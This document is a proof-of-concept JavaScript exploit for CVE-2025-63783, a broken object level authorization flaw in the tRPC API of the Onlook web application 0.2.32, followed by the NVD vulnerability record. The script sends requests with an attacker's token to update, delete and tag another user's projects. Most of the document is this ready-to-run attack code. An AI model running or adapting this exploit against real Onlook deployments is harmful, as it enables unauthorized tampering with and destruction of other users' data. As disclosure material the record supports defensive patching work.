CVE-2025-63783

import fetch from 'node-fetch'; // CVE-2025-63783 PoC - BOLA vulnerability in Onlook tRPC API // Target: Onlook web application 0.2.32 const TARGET_URL = 'http://target-onlook-instance.com'; const ATTACKER_TOKEN = 'attacker-auth-token-here'; async function exploitBola() { const victimProjectId = 'victim-project-uuid-here'; // PoC 1: Unauthorized Project Update const updatePayload = { jsonrpc: '2.0', id: 1, method: 'project.update', params: { projectId: victimProjectId, data: { name: 'Hacked by Attacker', description: 'This project was modified via BOLA vulnerability' } } }; const updateResponse = await fetch(`${TARGET_URL}/trpc`, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${ATTACKER_TOKEN}` }, body: JSON.stringify(updatePayload) }); console.log('Update Response:', await updateResponse.json()); // PoC 2: Unauthorized Project Delete const deletePayload = { jsonrpc: '2.0', id: 2, method: 'project.delete', params: { projectId: victimProjectId } }; const deleteResponse = await fetch(`${TARGET_URL}/trpc`, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${ATTACKER_TOKEN}` }, body: JSON.stringify(deletePayload) }); console.log('Delete Response:', await deleteResponse.json()); // PoC 3: Unauthorized Tag Manipulation const tagPayload = { jsonrpc: '2.0', id: 3, method: 'project.addTag', params: { projectId: victimProjectId, tag: 'malicious-tag' } }; const tagResponse = await fetch(`${TARGET_URL}/trpc`, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${ATTACKER_TOKEN}` }, body: JSON.stringify(tagPayload) }); console.log('Tag Response:', await tagResponse.json()); } exploitBola().catch(console.error);

{"cve": {"id": "CVE-2025-63783", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:42.943", "lastModified": "2026-02-05T16:25:17.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Broken Object Level Authorization (BOLA) vulnerability was discovered in the tRPC project mutation APIs (update, delete, add/remove tag) of the Onlook web application 0.2.32. The vulnerability exists because the API fails to verify the ownership or membership of the currently authenticated user for the requested project ID. An authenticated attacker can send a malicious request containing another user's project ID to unlawfully modify, delete, or manipulate tags on that project, which can severely compromise data integrity and availability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:onlook:onlook:0.2.32:*:*:*:*:*:*:*", "matchCriteriaId": "6A720EDB-10C0-47F4-BCF5-138FB5124DFA"}]}]}], "references": [{"url": "https://blog.soohyun.tech/CVE-2025-63783-IDOR-in-Onlook-27a557175d2e8061a3dbc931da53f095", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://tossbank.notion.site/IDOR-in-onlook-27a557175d2e8061a3dbc931da53f095", "source": "[email protected]", "tags": ["Broken Link"]}]}}